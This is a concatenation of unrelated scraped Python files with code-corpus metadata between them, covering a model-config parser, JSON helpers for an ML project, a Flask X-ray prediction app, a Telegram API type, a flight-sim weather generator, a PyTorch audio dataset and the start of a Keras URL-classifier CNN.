        conf[ModelKeys.data_type] = mace_pb2.DT_FLOAT
    else:
        if ModelKeys.data_type in conf:
            conf[ModelKeys.data_type] = parse_internal_data_type(
                conf[ModelKeys.data_type])
        else:
            conf[ModelKeys.data_type] = mace_pb2.DT_HALF
    # parse input
    conf[ModelKeys.input_tensors] = to_list(conf[ModelKeys.input_tensors])
    conf[ModelKeys.input_tensors] = [str(i) for i in
                                     conf[ModelKeys.input_tensors]]
    input_count = len(conf[ModelKeys.input_tensors])
    conf[ModelKeys.input_shapes] = [parse_int_array(shape) for shape in
                                    to_list(conf[ModelKeys.input_shapes])]
    mace_check(
        len(conf[ModelKeys.input_shapes]) == input_count,
        "input node count and shape count do not match")
    normalize_input_data_types(conf, input_count)
    # Data formats default to NHWC; a single entry is broadcast.
    input_data_formats = [parse_data_format(df) for df in
                          to_list(conf.get(ModelKeys.input_data_formats,
                                           ["NHWC"]))]
    if len(input_data_formats) == 1 and input_count > 1:
        input_data_formats = [input_data_formats[0]] * input_count
    mace_check(len(input_data_formats) == input_count,
               "the number of input_data_formats should be "
               "the same as input tensors")
    conf[ModelKeys.input_data_formats] = input_data_formats
    # Value ranges (used for generating validation data) default to [-1, 1].
    input_ranges = [parse_float_array(r) for r in
                    to_list(conf.get(ModelKeys.input_ranges,
                                     ["-1.0,1.0"]))]
    if len(input_ranges) == 1 and input_count > 1:
        input_ranges = [input_ranges[0]] * input_count
    mace_check(len(input_ranges) == input_count,
               "the number of input_ranges should be "
               "the same as input tensors")
    conf[ModelKeys.input_ranges] = input_ranges
    # parse output
    conf[ModelKeys.output_tensors] = to_list(conf[ModelKeys.output_tensors])
    conf[ModelKeys.output_tensors] = [str(i) for i in
                                      conf[ModelKeys.output_tensors]]
    output_count = len(conf[ModelKeys.output_tensors])
    conf[ModelKeys.output_shapes] = [parse_int_array(shape) for shape in
                                     to_list(conf[ModelKeys.output_shapes])]
    mace_check(len(conf[ModelKeys.output_tensors]) == output_count,
               "output node count and shape count do not match")
    normalize_output_data_types(conf, output_count)
    output_data_formats = [parse_data_format(df) for df in
                           to_list(conf.get(ModelKeys.output_data_formats,
                                            ["NHWC"]))]
    if len(output_data_formats) == 1 and output_count > 1:
        output_data_formats = [output_data_formats[0]] * output_count
    mace_check(len(output_data_formats) == output_count,
               "the number of output_data_formats should be "
               "the same as output tensors")
    conf[ModelKeys.output_data_formats] = output_data_formats
    # Optional tensors used only for validation checks.
    if ModelKeys.check_tensors in conf:
        conf[ModelKeys.check_tensors] = to_list(conf[ModelKeys.check_tensors])
        conf[ModelKeys.check_shapes] = [parse_int_array(shape) for shape in
                                        to_list(conf[ModelKeys.check_shapes])]
        mace_check(len(conf[ModelKeys.check_tensors]) == len(
            conf[ModelKeys.check_shapes]),
            "check tensors count and shape count do not match.")
    MaceLogger.summary(conf)
    return conf
{
"api_name": "re.sub",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "yaml.load",
"line_number": 44,
... |
45097764726 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 18:29:51 2020
@author: rosaz
"""
import argparse
import sys
import errno
import os
import json
import numpy as np
from matplotlib import pyplot as plt
from numpy import array
import torch
import jsonschema
from torch.nn import functional as F
def writeJsonNorma(path, media, dev, time):
    """Create or update the "normalize" section of the JSON file at *path*,
    storing {"normalize": {"mean": ..., "dev_std": ..., "time": ...}}.

    Bug fixed: the original update path wrote different key names
    ("media"/"dev"/"computeTime") than the create path, so re-running the
    normalization produced an inconsistent schema; both paths now write
    the same keys.  The two identical branches of the inner if/else were
    also collapsed.
    """
    entry = {"mean": media, "dev_std": dev, "time": time}
    if not os.path.exists(path):
        data = {"normalize": entry}
    else:
        with open(path, "r") as infile:
            data = json.load(infile)
        data["normalize"] = entry
    with open(path, "w") as outfile:
        json.dump(data, outfile, indent=2)
"""
if not (data.get(dev) is None):
#print("value is present for given JSON key")
print(data.get(dev))
#aggiungi chiavi
data["dev_std"]=dev
with open(path, "w") as outfile:
json.dump(data,outfile,indent=2)
else:
data["dev_std"]=dev
with open(path, "w") as outfile:
json.dump(data,outfile)
if not (data.get(time) is None):
#print("value is present for given JSON key")
print(data.get(time))
#aggiungi chiavi
data["time"] = time
with open(path, "w") as outfile:
json.dump(data,outfile)
else:
data["time"] = time
with open(path, "w") as outfile:
json.dump(data,outfile)
"""
def controlFile2():
    """Verify that the three dataset CSVs exist, exiting on any IOError.

    NOTE(review): exit() is called unconditionally inside the handler, so
    the errno != ENOENT check below it is unreachable dead code.
    """
    try:
        with open("Dataset/train.csv") as f:
            print("ok")
        with open("Dataset/valid.csv") as f:
            print("ok")
        with open("Dataset/test.csv") as f:
            print("ok")
        # File exists
    except IOError as e:
        print("fatal error", file=sys.stderr)
        exit()
        # Raise the exception if it is not ENOENT (No such file or directory)
        if e.errno != errno.ENOENT:  # unreachable: exit() already raised SystemExit
            print("fatal error", file=sys.stderr)
            exit(0)
print("ciao")
def createFolder(path):
    """Ensure directory *path* exists (created with mode 0o777 when
    missing).  Prints "exist the directory ..." on every non-failing run
    — including right after a successful creation, matching the original
    try/else flow — and swallows creation failures with a message."""
    if os.path.exists(path):
        print("exist the directory %s" % path)
        return
    try:
        os.mkdir(path, 0o777)
    except OSError:
        print("Creation of the directory %s failed" % path)
    else:
        print("exist the directory %s" % path)
def controlFile(path):
    """If <path>\\normalize.json exists, ask whether the mean and std
    should be recomputed; re-prompts on any answer other than "y"/"n".
    A missing file prints "Normalize"; other IOErrors terminate.

    Bug fixed: the retry branch called controlFile() without the required
    *path* argument, raising TypeError on any invalid answer.
    """
    try:
        with open(path + "\\normalize.json") as f:
            response = input("Do you want to re-calculate the mean and standard deviation? y | n : ")
            if response == "y":
                print("recalculate")
            elif response == "n":
                print("no")
            else:
                controlFile(path)  # fix: forward the path on retry
    except IOError as e:
        print("Normalize")
        # Raise the exception if it is not ENOENT (No such file or directory)
        if e.errno != errno.ENOENT:
            print("fatal error", file=sys.stderr)
            exit(0)
def readNorm(path):
    """Read the mean and dev_std arrays from <path>\\normalize.json and
    return them as a pair of tuples."""
    with open(path + '\\normalize.json') as json_file:
        stats = json.load(json_file)
    return tuple(stats["mean"]), tuple(stats["dev_std"])
"""""fuzione che aggiunge nuove keys se non esistono, mentre aggiorna valori se le chiavi esistono """
def controlNormalize(path):
    """Interactively decide whether mean/dev_std need recomputing based on
    the contents of <path>\\dataSetJson.json (creating *path* first)."""
    # check whether the directory is present, otherwise create it
    createFolder(path)
    # print("Controll")
    if not os.path.exists(path + '\\dataSetJson.json'):
        print("1) Checking: mean, dev_std")
    else:  # the file exists: check whether the mean and dev keys are there
        try:
            with open(path + "\\dataSetJson.json", "r") as json_file:
                data = json.load(json_file)
                print(path + "\\dataSetJson.json")
                if not (data.get('normalize') is None):
                    norm = data['normalize']
                    print(norm)
                    # NOTE(review): precedence makes this
                    # `(mean and dev_std) is None` — likely meant to test
                    # each key separately; confirm intent.
                    if not (norm.get('mean') and norm.get('dev_std')) is None:
                        response = input("Do you want to re-calculate the mean and standard deviation? y | n : ")
                        if (response == "y"):
                            print("recalculate")
                        elif (response == "n"):
                            print("bypass this step!!")
                            media = tuple(norm['mean'])
                            print(media)
                            dev = tuple(norm['dev_std'])
                            print(dev)
                        else:
                            # NOTE(review): drops *path* — TypeError on retry;
                            # should presumably be controlNormalize(path).
                            controlNormalize()
                    else:
                        print("non esiste mean e dev_std, ricalcola")
                else:
                    print("non esiste normalize")
        except:
            # parsing failed: recompute mean and dev
            print("Il parsing è errato")
def writeJsonAccuracy(path, fileName, entry, accuracy, entryTime, time):
    """Store *accuracy* under key *entry* and *time* under key *entryTime*
    in <path>\\<fileName>, creating the directory/file as needed; any
    parse failure falls back to rewriting the file from scratch.

    NOTE(review): the update path rewrites the whole file once per key
    while the read handle is still open; works on POSIX but is fragile.
    """
    # a_cc = {entry: accuracy}
    # timeTrain = {entryTime: time}
    # If the file does not exist, create it fresh with both keys.
    createFolder(path)
    if not os.path.exists(path + "\\" + fileName):
        print("File non esiste")
        entry = {entry: accuracy, entryTime: time}
        with open(path + "\\" + fileName, "w") as outfile:
            json.dump(entry, outfile)
    # Otherwise the file exists: try to parse and update it in place.
    else:
        print("Qui")
        try:
            # Read in the JSON document (parsing succeeded).
            with open(path + "\\" + fileName, "r") as outfile:
                print("qui3")
                datum = json.load(outfile)
                # Update the accuracy key, creating it when missing.
                if not (datum.get(entry) is None):
                    print("value is present for given JSON key")
                    print(datum.get(entry))
                    datum[entry] = accuracy
                    with open(path + "\\" + fileName, "w") as outfile:
                        json.dump(datum, outfile)
                else:
                    print("Chiave non esiste")
                    # entry = {entry: accuracy, entryTime: time}
                    datum[entry] = accuracy
                    with open(path + "\\" + fileName, "w") as json_outfile:
                        json.dump(datum, json_outfile)
                # Update the time key, creating it when missing.
                if not (datum.get(entryTime) is None):
                    print("value is present for given JSON key")
                    print(datum.get(entryTime))
                    datum[entryTime] = time
                    with open(path + "\\" + fileName, "w") as json_outfile:
                        json.dump(datum, json_outfile)
                else:
                    print("Chiave non esiste")
                    datum[entryTime] = time
                    with open(path + "\\" + fileName, "w") as json_outfile:
                        json.dump(datum, json_outfile)
        except:
            # Parse failed: overwrite with a fresh two-key document.
            print("Qui2")
            entry = {entry: accuracy, entryTime: time}
            with open(path + "\\" + fileName, "w") as outfile:
                json.dump(entry, outfile)
def plot(path="Model-1"):
    """Demo figure: two side-by-side hard-coded loss curves, saved to
    <path>\\filename.png at 600 dpi and shown interactively."""
    plt.figure()
    plt.subplot(121)
    plt.ylabel('loss train')
    plt.xlabel('num samples')
    plt.grid()
    plt.plot([1, 2, 3, 4], [1, 4, 9, 16])
    plt.subplot(122)
    plt.plot([1, 2, 3, 3, 2, 4], [1, 5, 6, 4, 9, 16])
    plt.ylabel('loss validation')
    plt.xlabel('num samples')
    plt.grid()
    plt.savefig(path + '\\filename.png', dpi=600)
    plt.show()
def writeJsonAppend(path, num, accuracy):
    """Append {'acc': accuracy, 'time': 'wdd'} to the JSON list stored in
    <path>\\nuovo.json, creating the file with a one-element list when
    missing.  (*num* is unused; kept for interface compatibility.)"""
    record = {'acc': accuracy, 'time': "wdd"}
    target = path + "\\nuovo.json"
    if os.path.isfile(target):
        with open(target) as feedsjson:
            records = json.load(feedsjson)
        records.append(record)
    else:
        records = [record]
    with open(target, mode='w') as f:
        f.write(json.dumps(records, indent=2))
def writeJsonUpdate(path, num, accuracy):
    """Create <path>\\nuovo.json with a single record when missing;
    otherwise reload it and, if it is a dict whose "accuracy" key is
    truthy, reset its "acc" field to 2 and rewrite the file.

    Bugs fixed: the original wrote through the undefined name ``f``
    before any write handle was opened (NameError) and indexed
    ``feeds["accuracy"]`` unconditionally (KeyError on the list layout
    produced by the create branch and by writeJsonAppend).
    """
    record = {'acc': accuracy, 'time': "wdd"}
    target = path + "\\nuovo.json"
    if not os.path.isfile(target):
        with open(target, mode='w') as f:
            f.write(json.dumps([record], indent=2))
        return
    with open(target) as feedsjson:
        feeds = json.load(feedsjson)
    if isinstance(feeds, dict) and feeds.get("accuracy"):
        feeds["acc"] = 2
    with open(target, mode='w') as f:
        f.write(json.dumps(feeds, indent=2))
def arrayLogic():
    """Demo: print a numpy array (plus its type and length) and a 0/1
    indicator list marking which elements equal 3."""
    values = np.array([4, 3, 3, 3, 3, 2, 1])
    print(values)
    print(type(values))
    print(len(values))
    indicator = [1 if element == 3 else 0 for element in values]
    print(indicator)
def distanza():
    """Scratch experiment (contrastive-loss style): compute the pairwise
    distance between fixed tensors, clamp margin-d at zero, and derive a
    similar/dissimilar label from whether the clamped value hit zero.
    Runs twice — once for identical tensors (A,B) and once for A vs 4*A —
    printing everything; nothing is returned."""
    A = torch.Tensor([
        [[1, 2, 3], [4, 5, 6], [7, 8, 9]],
        [[11, 12, 13], [14, 15, 16], [17, 18, 19]],
        [[21, 22, 23], [24, 25, 26], [27, 28, 29]],
    ])
    print(A)
    print(A.size())
    margin = 2
    margin2 = 1  # unused
    B = torch.Tensor([
        [[1, 2, 3], [4, 5, 6], [7, 8, 9]],
        [[11, 12, 13], [14, 15, 16], [17, 18, 19]],
        [[21, 22, 23], [24, 25, 26], [27, 28, 29]],
    ])
    C = A * 4
    d = F.pairwise_distance(A, B)
    print("di", d)
    print("Margin-di", margin - d)
    tensor = torch.clamp(margin - d, min=0)  # clamp at zero -- zero means the pair is dissimilar
    print("max m-d", tensor)
    tensorSimil = torch.Tensor([0])
    tensorDissimil = torch.Tensor([1])
    result = torch.where(tensor == 0., tensorDissimil, tensorSimil)
    print("max result Label", result)
    print(result[0][0])
    if (result[0][0] == 1.):
        label = 1
        print("Dissimili", label)
    else:
        label = 0
        print("Simil", label)
    # Same computation against the scaled tensor C = 4*A.
    di = F.pairwise_distance(A, C)
    print("di", di)
    print("Margin-di", margin - di)
    tensor = torch.clamp(margin - di, min=0)  # clamp at zero -- zero means the pair is dissimilar
    print("max m-d", tensor)
    tensorSimil = torch.Tensor([0])
    tensorDissimil = torch.Tensor([1])
    result = torch.where(tensor == 0., tensorDissimil, tensorSimil)
    print("max result Label", result)
    print(result[0][0])
    if (result[0][0] == 1.):
        label = 1
        print("Dissimili", label)
    else:
        label = 0
        print("Simil", label)
    # matrix = tensor.numpy()
    # print("Matrix",matrix.ravel(), type(matrix))
    # list(matrix)
    # print(np.all([n<=margin for n in tensor]))
    """
    if(tensor <= margin):
        print("Simili A e B")
    else:
        print("Dissimili A e B")
    """
def readFileDataset(path, entry):
    """Return data[entry] from the JSON file at *path*; exits the process
    when the file is missing and returns None when the key is absent."""
    if not os.path.exists(path):
        print("Dataset is not present, try --create dataset", file=sys.stderr)
        exit(0)
    with open(path, "r") as fh:
        content = json.load(fh)
    if content.get(entry) is not None:
        return content[entry]
def lengthDataset(path, entry, key):
    """Sum the *key* field across the objects listed under data[entry] in
    the JSON file at *path*; objects lacking *key* contribute nothing.
    Exits the process when the file is missing."""
    if not os.path.exists(path):
        print("Dataset is not present, try --create dataset", file=sys.stderr)
        exit(0)
    with open(path, "r") as fh:
        data = json.load(fh)
    if data.get(entry) is not None:
        return sum(obj[key] for obj in data[entry] if obj.get(key) is not None)
def print_to_stderr(*a):
    """Print every positional argument to stderr."""
    print(*a, file=sys.stderr)
## AGGIIUNGI FUNZIONA
def addJsonModel(directory, version, acc, f1score, precision, recall, time):
    """Store *acc* as data[version]["accuracy"]["accuracyTest"] in
    provaJson.json, exiting when the file is missing.

    NOTE(review): *path* is hard-coded, so *directory* is ignored, and
    f1score/precision/recall/time are never written.  Also note the typo
    "accuracyTets" in the key check below — both branches end up doing
    the same assignment.
    """
    path = "provaJson.json"
    if not os.path.exists(path):
        print("File %s not is exists" % path)
        sys.stderr.write("File %s not is exists" % path)
        exit(0)
    else:
        # Read the existing document.
        with open(path, "r") as outfile:
            data = json.load(outfile)
        if not (data.get(version) is None):  # version already present: update fields
            print(data.get(version))
            versione = data[version]
            if not (versione.get("accuracy") is None):  # accuracy section present: update it
                obj = versione["accuracy"]
                if not (obj.get("accuracyTets") is None):  # NOTE(review): typo, see docstring
                    obj["accuracyTest"] = acc
                    with open(path, "w") as outfile:
                        json.dump(data, outfile, indent=2)
                else:
                    obj["accuracyTest"] = acc
                    with open(path, "w") as outfile:
                        json.dump(data, outfile, indent=2)
            else:
                print("non esiste")
                value = {"accuracyTest": acc}
                versione["accuracy"] = value
                with open(path, "w") as outfile:
                    json.dump(data, outfile, indent=2)
def addValueJsonModel(path, num, key, entry, value):
    """Set data[num][key][entry] = value in the JSON file at *path*,
    creating the intermediate objects as needed, and rewrite the file
    with indent=2.  Exits the process when the file does not exist
    (matching the original behaviour).

    Bugs fixed: the original shadowed *path* with the hard-coded
    "provaJson.json" (the parameter was silently ignored), and when
    *key* was missing it stored the new section under *entry* instead
    of *key*.
    """
    if not os.path.exists(path):
        print("File %s not is exists" % path)
        sys.stderr.write("File %s not is exists" % path)
        exit(0)
    with open(path, "r") as infile:
        data = json.load(infile)
    version = data.setdefault(num, {})
    section = version.setdefault(key, {})
    section[entry] = value
    with open(path, "w") as outfile:
        json.dump(data, outfile, indent=2)
def writeJson(model, num, media, dev, time):
    """Create directory *model* (mode 0o777) if needed — exiting if the
    creation fails — then write normalize.json inside it with the model
    number, mean, dev_std and timing."""
    folder = model
    try:
        if not os.path.exists(folder):
            os.mkdir(folder, 0o777)
            print("Successfully created the directory %s" % folder)
        else:
            print("Directory exist")
    except OSError:
        print("Creation of the directory %s failed" % folder)
        exit(0)
    payload = {"model": num, "mean": media, "dev_std": dev, "time": time}
    with open(folder + "\\normalize.json", "w") as outfile:
        json.dump(payload, outfile)
# No such file or directory
"""
a = np.arange(10).reshape(2,5) # a 2 by 5 array
b = a.tolist()
writeJson("Model-1",b,1243,33,"2e33333sec")
"""
#controlFile("Model-1")
#arrayM, arrayD = readNorm("Model-1")
#print(arrayM)
#print(arrayD)
#plot("Model-1")
entry= "acc"
entryTime="nuvissima"
time="3haf"
accuracy =125
path="Model-1"
#writeJsonAccuracy(path,"normalize.json",entry, accuracy, entryTime, time)
media=[2,4,3,4]
dev=[3,4,5,4]
time="23sec"
#writeJsonNorma("Dataset\dataSetJson.json",media,dev,time)
"""
value=readFileDataset("Dataset\dataSetJson.json", "datasetLarge")
for i in value:
print(i)
key = "num_sample"
num = lengthDataset("Dataset\dataSetJson.json","datasetLarge",key)
print(num)
#ok distanza()
#
#arrayLogic()
"""
"""
parser = argparse.ArgumentParser( description = "Dataset Money")
parser.add_argument('--model', help = "Name of model [modello1 | modello2 | modello3]", type=str)
parser.add_argument('--v', help ="version" , type=int)
args = parser.parse_args()
required_together = ('model','v')
# args.b will be None if b is not provided
if not all([getattr(args,x) for x in required_together]):
raise RuntimeError("Cannot supply --model without --v")
else:
if args.model == "model1":
print("model ",args.model)
if args.v == 1:
print("version",args.v)
else:
print("Versione non riconoscita [1 | 2 | 3]")
print_to_stderr("Hello World")
else:
print("Modello non riconosciuto [modello1 | modello2 | modello3]")
print(type(sys.stderr))
"""
#sys.stderr.write("Error messages can go here\n")
acc="uffa"
f1score="score111"
precision="perfect"
recall="recallll"
time="142sec"
#addJsonModel("provaJson.json","1", acc ,f1score, precision, recall, time)
key="accuracy"
entry="accuracyTrain"
value="ValoreAcc"
#addValueJsonModel("provaJson.json","1", key ,entry, value)
key="time"
entry="timeTrain"
value="ValoreTime"
#addValueJsonModel("provaJson.json","1", key ,entry, value)
controlNormalize("Dataset") | rroosa/machineL | ProjectCode/file_prove.py | file_prove.py | py | 18,111 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "json.dump",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": ... |
34002187294 | import os
from app import app
from flask import Flask, flash, request, redirect, url_for, render_template
from werkzeug.utils import secure_filename
from pneumonia_prediction import predict
import tensorflow as tf
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
os.environ["CUDA_VISIBLE_DEVICES"]="-1"
physical_devices = tf.config.list_physical_devices('CPU')
mariaunet = tf.keras.models.load_model('mariaunet')
def allowed_file(filename):
    """Return True when *filename* has an extension in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
@app.route('/')
def upload_form():
    """Render the file-upload page (GET /)."""
    return render_template('upload.html')
@app.route('/', methods=['POST'])
def upload_image():
    """Handle a POSTed X-ray image: store it, run the model, show the result."""
    # The browser must have sent a multipart field called 'file'.
    if 'file' not in request.files:
        flash('No file part')
        return redirect(request.url)
    upload = request.files['file']
    # An empty filename means the form was submitted without choosing a file.
    if upload.filename == '':
        flash('No image selected for uploading')
        return redirect(request.url)
    if not (upload and allowed_file(upload.filename)):
        flash('Allowed image types are -> png, jpg, jpeg')
        return redirect(request.url)
    secure_filename(upload.filename)  # sanitised name computed but unused, as in the original
    # Every upload is stored under the same fixed name, replacing the previous one.
    destination = os.path.join(app.config['UPLOAD_FOLDER'], 'xray.jpg')
    if os.path.exists(destination):
        os.remove(destination)
    upload.save(destination)
    flash('Image successfully uploaded and displayed below')
    predict(destination, mariaunet)
    return render_template('upload.html', filename='xray.jpg')
@app.route('/display/<filename>')
def display_image(filename):
    """Redirect (301) to the uploaded image served from the static folder."""
    return redirect(url_for('static', filename='uploads/' + filename), code=301)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8000)
| Nathanael-Mariaule/Pneumonia_Detection | flask_app/main.py | main.py | py | 1,710 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.config.list_physical_devices",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "tensorflow.config",
"line_number": 13,
"usage_type": "attribute"
},
{
"ap... |
31062929205 |
from ..utils import Object
class ChatStatisticsMessageSenderInfo(Object):
    """
    Contains statistics about messages sent by a user

    Attributes:
        ID (:obj:`str`): ``ChatStatisticsMessageSenderInfo``

    Args:
        user_id (:obj:`int`):
            User identifier
        sent_message_count (:obj:`int`):
            Number of sent messages
        average_character_count (:obj:`int`):
            Average number of characters in sent messages; 0 if unknown

    Returns:
        ChatStatisticsMessageSenderInfo

    Raises:
        :class:`telegram.Error`
    """
    # Type identifier string for this API object.
    ID = "chatStatisticsMessageSenderInfo"

    def __init__(self, user_id, sent_message_count, average_character_count, **kwargs):
        self.user_id = user_id  # int
        self.sent_message_count = sent_message_count  # int
        self.average_character_count = average_character_count  # int

    @staticmethod
    def read(q: dict, *args) -> "ChatStatisticsMessageSenderInfo":
        """Deserialise an instance from a response dict; missing keys become None."""
        user_id = q.get('user_id')
        sent_message_count = q.get('sent_message_count')
        average_character_count = q.get('average_character_count')
        return ChatStatisticsMessageSenderInfo(user_id, sent_message_count, average_character_count)
| iTeam-co/pytglib | pytglib/api/types/chat_statistics_message_sender_info.py | chat_statistics_message_sender_info.py | py | 1,244 | python | en | code | 20 | github-code | 36 | [
{
"api_name": "utils.Object",
"line_number": 6,
"usage_type": "name"
}
] |
40568587585 | from datetime import datetime
from typing import Optional
from dcs.mission import Mission
from game.weather.atmosphericconditions import AtmosphericConditions
from game.weather.clouds import Clouds
from game.weather.conditions import Conditions
from game.weather.fog import Fog
from game.weather.wind import WindConditions
class EnvironmentGenerator:
    """Writes campaign weather and start-time conditions into a DCS Mission."""

    def __init__(
        self, mission: Mission, conditions: Conditions, time: datetime
    ) -> None:
        self.mission = mission
        self.conditions = conditions
        self.time = time

    def set_atmospheric(self, atmospheric: AtmosphericConditions) -> None:
        """Apply pressure (QNH, mmHg), temperature and ground turbulence."""
        self.mission.weather.qnh = atmospheric.qnh.mm_hg
        self.mission.weather.season_temperature = atmospheric.temperature_celsius
        self.mission.weather.turbulence_at_ground = int(atmospheric.turbulence_per_10cm)

    def set_clouds(self, clouds: Optional[Clouds]) -> None:
        """Copy the cloud layer definition; None keeps the mission defaults."""
        if clouds is None:
            return
        self.mission.weather.clouds_base = clouds.base
        self.mission.weather.clouds_thickness = clouds.thickness
        self.mission.weather.clouds_density = clouds.density
        self.mission.weather.clouds_iprecptns = clouds.precipitation
        self.mission.weather.clouds_preset = clouds.preset

    def set_fog(self, fog: Optional[Fog]) -> None:
        """Copy fog visibility (metres) and thickness; None keeps defaults."""
        if fog is None:
            return
        self.mission.weather.fog_visibility = int(fog.visibility.meters)
        self.mission.weather.fog_thickness = fog.thickness

    def set_wind(self, wind: WindConditions) -> None:
        """Apply wind at the three reference altitudes (0 m, 2000 m, 8000 m)."""
        self.mission.weather.wind_at_ground = wind.at_0m
        self.mission.weather.wind_at_2000 = wind.at_2000m
        self.mission.weather.wind_at_8000 = wind.at_8000m

    def generate(self) -> None:
        """Entry point: apply the start time and all weather components."""
        self.mission.start_time = self.time
        self.set_atmospheric(self.conditions.weather.atmospheric)
        self.set_clouds(self.conditions.weather.clouds)
        self.set_fog(self.conditions.weather.fog)
        self.set_wind(self.conditions.weather.wind)
| dcs-liberation/dcs_liberation | game/missiongenerator/environmentgenerator.py | environmentgenerator.py | py | 2,028 | python | en | code | 647 | github-code | 36 | [
{
"api_name": "dcs.mission.Mission",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "game.weather.conditions.Conditions",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
"line_number": 15,
"usage_type": "name"
},
{
"api_name... |
6245629363 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
    """``python setup.py test`` command that runs the suite with pytest."""

    # BUG FIX: the original declared this class attribute as ``ptest_args``
    # (typo) while initialize_options() and run() both use ``pytest_args``,
    # so the class-level default was dead.
    pytest_args = []

    def initialize_options(self):
        TestCommand.initialize_options(self)
        self.pytest_args = []

    def run(self):
        # Imported lazily so setup.py works without pytest installed unless
        # the test command is actually invoked.
        import pytest
        pytest.main(self.pytest_args)
setup(
name='PyIEProxy',
version='0.1.0',
description='Python IE Proxy Switch',
url='https://github.com/magichan-lab/pyieproxy',
author='Magichan',
author_email='magichan.lab@gmail.com',
maintainer='Magichan',
maintainer_email='magichan.lab@gmail.com',
license='MIT',
packages=find_packages(exclude=["*.tests"]),
install_requires=['wheel', 'requests'],
zip_safe=False,
entry_points={
'console_scripts': [
'ie-proxy = bin.command:main',
]},
extras_require={
'test': ['pytest-cov',
'pytest-pep8',
'coverage',
'pep8',
'pytest'],
'docs': ['sphinx'],
},
cmdclass={'test': PyTest},
)
| magichan-lab/PyIEProxy | setup.py | setup.py | py | 1,119 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.command.test.test",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "setuptools.command.test.test.initialize_options",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "setuptools.command.test.test",
"line_number": 11,
"usage_type... |
72573548584 | import torch
import torchaudio
import glob
from torch.utils.data import Dataset
from utils.signal_processing import get_rnd_audio,extract_label_bat
from pandas import read_csv
from os import path
class raw_audio_dataset(Dataset):
    """Dataset of fixed-length random crops from a directory of wav files.

    Annotations come from a CSV with (at least) a 'File name' column; the
    remaining columns carry the label information consumed by
    extract_label_bat.
    """

    def __init__(self, wav_dir, annotation_file, input_size, transform=None, target_transform=None):
        """Initialise the audio dataset.

        Args:
            wav_dir: directory containing the wav files listed in the CSV.
            annotation_file: CSV annotation file with a 'File name' column.
            input_size: number of samples per random crop.
            transform: optional transform applied to the audio tensor.
            target_transform: optional transform applied to the label.
        """
        # BUG FIX: the original parsed the CSV twice (one read_csv call per
        # attribute); parse once and share the frame.
        annotations = read_csv(annotation_file)
        self.audio_files = annotations['File name']
        self.label = annotations
        self.transform = transform
        self.target_transform = target_transform
        self.input_size = input_size
        self.wav_dir = wav_dir

    def __len__(self):
        """Return the number of annotated audio files."""
        return len(self.audio_files)

    def __getitem__(self, idx):
        """Return one (audio, label) pair for row *idx* of the annotation CSV."""
        audio_path = path.join(self.wav_dir, self.audio_files[idx])
        # get_rnd_audio returns a tensor plus the crop boundaries (b, e),
        # which are needed to clip the label to the sampled window.
        audio, b, e = get_rnd_audio(audio_path, self.input_size)
        label = extract_label_bat(self.label.iloc[idx], b, e)
        if self.transform:
            audio = self.transform(audio)
        if self.target_transform:
            label = self.target_transform(label)
        return audio, label
| ArthurZucker/PAMAI | datasets/raw_audio_dataset.py | raw_audio_dataset.py | py | 1,409 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.join"... |
13058059804 | from string import printable
from keras.models import Model, load_model
from keras import regularizers
from keras.layers.core import Dense, Dropout, Lambda
from keras.layers import Input, ELU, Embedding, \
BatchNormalization, Convolution1D,concatenate
from keras.preprocessing import sequence
from keras.optimizers import Adam
from keras import backend as K
from keras.callbacks import CSVLogger
from utils import load_model, save_model
from keras.utils.vis_utils import plot_model
class CNNC:
    def __init__(self, max_len=75, emb_dim=32, max_vocab_len=100, w_reg=regularizers.l2(1e-4)):
        """Build and compile a character-level CNN URL classifier.

        max_len: input sequence length (characters per URL).
        emb_dim: character-embedding dimensionality.
        max_vocab_len: character vocabulary size.
        w_reg: regulariser applied to the embedding weights.
        NOTE(review): the default w_reg object is created once at class
        definition time and shared by all instances -- confirm intended.
        """
        self.max_len = max_len
        # Training progress is appended to CNN_log.csv (see train_model).
        self.csv_logger = CSVLogger('CNN_log.csv', append=True, separator=';')
        main_input = Input(shape=(max_len,), dtype='int32', name='main_input')
        # Embedding layer
        emb = Embedding(input_dim=max_vocab_len, output_dim=emb_dim, input_length=max_len,
                        W_regularizer=w_reg)(main_input)
        emb = Dropout(0.25)(emb)

        def sum_1d(X):
            # Collapse the temporal axis so each filter yields one scalar.
            return K.sum(X, axis=1)

        def get_conv_layer(emb, kernel_size=5, filters=256):
            # Conv layer
            conv = Convolution1D(kernel_size=kernel_size, filters=filters, \
                                 border_mode='same')(emb)
            conv = ELU()(conv)
            conv = Lambda(sum_1d, output_shape=(filters,))(conv)
            # conv = BatchNormalization(mode=0)(conv)
            conv = Dropout(0.5)(conv)
            return conv

        # Multiple Conv Layers
        # calling custom conv function from above
        conv1 = get_conv_layer(emb, kernel_size=2, filters=256)
        conv2 = get_conv_layer(emb, kernel_size=3, filters=256)
        conv3 = get_conv_layer(emb, kernel_size=4, filters=256)
